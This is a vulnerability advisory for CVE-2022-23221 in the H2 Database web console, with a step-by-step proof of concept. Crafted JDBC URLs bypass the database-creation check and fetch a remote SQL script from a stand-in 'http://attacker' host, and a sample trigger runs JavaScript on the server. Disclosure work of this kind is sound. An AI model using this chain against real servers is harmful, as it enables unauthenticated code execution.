The H2 Database console suffers from an unauthenticated remote code execution vulnerability.
5d78c725ce53c3a68233c0136fdf6a82Document Title
===============
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.
Product Description
===============
The H2 Console Application
The Console lets you access a SQL database using a browser interface.
Homepage: http://www.h2database.com/html/quickstart.html
Affected Components
===============
File Name: WebServer.java
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java
Impacted Function: getConnection
PoC
===============
1) Navigate to the console and attempt to connect to a H2 in memory
database that does not exist using the following JDBC URL:
```
jdbc:h2:mem:1337;
```
2) Note that you get the following security exception preventing you
from creating a new in memory database:
```
Database "mem:1337" not found, either pre-create it or allow remote
database creation (not recommended in secure environments) [90149-209]
90149/90149 (Help)
```
3) Now try again with the following JDBC URL:
```
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\
```
4) Note that you were able to successfully create a new in memory database
5) Create a SQL file that contains a trigger that executes
java/javascript/ruby code when executed and host it on a domain you
control (ex: http://attacker)
6) Use the following JDBC URL to execute the SQL file hosted on your
domain on connect:
```
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
FROM 'http://attacker/evil.sql';'\
```
Example evil.sql file:
```
CREATE TABLE test (
id INT NOT NULL
);
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
var fos = Java.type("java.io.FileOutputStream");
var b = new fos ("/tmp/pwnedlolol");';
INSERT INTO TEST VALUES (1);
```
CVE Issued: CVE-2022-23221